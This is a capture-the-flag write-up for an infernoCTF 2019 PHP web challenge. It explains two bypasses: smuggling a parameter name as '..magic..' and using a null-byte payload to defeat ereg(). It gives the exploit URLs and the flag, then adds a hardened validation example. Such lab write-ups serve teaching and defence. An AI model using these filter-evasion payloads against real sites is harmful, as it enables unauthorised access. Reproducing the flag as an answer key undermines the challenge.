# Dante's Personal Home Page
## 180

Dante has used some PHP on his site but it only allows magicians to enter. Show him your magical skills!!

Author : MrT4ntr4

# Solution

Our challenge is the following PHP file:
```php

```

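To get the flag, we need to pass some checks that look like contradictions.

First of all, we need to set `__magic__`, but our URL can't contain `_` (or a space). URL-encoding the underscore does not help, because the query string is decoded before the check.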
```php
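// The parameter must be present under the name __magic__ ...
if (isset ($_GET['__magic__'])) {
    $magic = $_GET['__magic__'];

    // ... but the URL-decoded raw query string must not contain '_' or ' '.
    $check = urldecode($_SERVER['QUERY_STRING']);

    if(preg_match("/_| /i", $check))
    {
        die("Get yourself some coffee");
    }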
```

After we successfully complete the part above, the value has to be alphanumeric only to continue, but to get the flag it has to contain `$dark$`.
```php
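    // ereg() must accept the value as purely alphanumeric ...
    if (ereg ("^[a-zA-Z0-9]+$", $magic) === FALSE)
        echo 'Only Alphanumeric accepted';
    // ... while strpos() must still find the non-alphanumeric '$dark$' in it.
    else if (strpos ($magic, '$dark$') !== FALSE)
    {
        if (!is_array($magic)){
            echo "Congratulations! FLAG is : ".$flag;
        }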
```

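## Bypassing the underscore check:

`$_GET['__magic__']` will also return the value sent as `..magic..`. The reason is less dark than it looks: PHP converts dots and spaces in incoming parameter names to underscores when it populates `$_GET`, so `..magic..` is registered as `__magic__`. The filter, however, runs on the raw `$_SERVER['QUERY_STRING']`, which still contains the dots and no underscore. So we can use the following URL parameter: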

```
http://address:port?..magic..=arcane
```

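## Bypassing the alphanumeric check:

Nothing but `$dark$` magic will work on this mighty PHP wizard, and his `ereg()` charm protects him from any kind of non-alphanumeric magic.

However, his `ereg()` magic has a weak spot: it is not binary-safe and only protects him until a null byte is encountered. `strpos()` has no such limit, so it still finds the `$dark$` that follows the null byte. (`ereg()` was deprecated in PHP 5.3 and removed in PHP 7.0.)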

Casting the following will give us the flag:
```
http://address:port?..magic..=a%00$dark$
```

flag: `infernoCTF{1_gu3ss_y0ur_m4g1c_was_w4y_t00_d4rk}`
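A hardened form of the two checks, as an added example that is not part of the original writeup or the challenge code: it validates the parameter PHP actually registered instead of pattern-matching the raw query string, and replaces `ereg()` with the binary-safe `preg_match()` anchored with `\A` and `\z`. The function names and sample query strings are constructed for illustration, and the code assumes PHP 8 (for the `mixed` type); `parse_str()` applies the same name mangling as `$_GET`.

```php
<?php
declare(strict_types=1);

// Added example: function names and sample inputs are constructed (PHP 8+).

/**
 * Parse a raw query string the way PHP fills $_GET.
 * parse_str() applies the same mangling: '.' and ' ' in names become '_'.
 */
function parsed_params(string $rawQuery): array
{
    parse_str($rawQuery, $params);
    return $params;
}

/** Binary-safe whitelist: the whole string must be alphanumeric (no NUL, no trailing newline). */
function is_alnum(mixed $value): bool
{
    return is_string($value) && preg_match('/\A[a-zA-Z0-9]+\z/', $value) === 1;
}

/** Return the validated value of __magic__, or null if it is absent or rejected. */
function checked_magic(string $rawQuery): ?string
{
    $params = parsed_params($rawQuery);
    $magic  = $params['__magic__'] ?? null;   // look at the key PHP actually registered
    return is_alnum($magic) ? $magic : null;
}

// Constructed sample query strings, including the two from the writeup.
$samples = [
    '__magic__=arcane',
    '..magic..=arcane',        // name is mangled to __magic__
    '..magic..=a%00$dark$',    // NUL byte followed by non-alphanumerics
    '__magic__[]=arcane',      // array instead of string
];

foreach ($samples as $q) {
    $keys = implode(',', array_keys(parsed_params($q)));
    $res  = checked_magic($q);
    printf("%-24s keys=%-10s accepted=%s\n", $q, $keys, var_export($res, true));
}
```

The first two samples are accepted under the same key `__magic__`, which shows why filtering the raw query string for `_` says nothing about the names PHP registers; the last two are rejected because the whole byte string, including anything after a null byte, is matched.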

Original writeup (https://github.com/ioncodes/excusemewtf/tree/master/infernoCTF/2019/Web/Dante's%20Personal%20Home%20Page).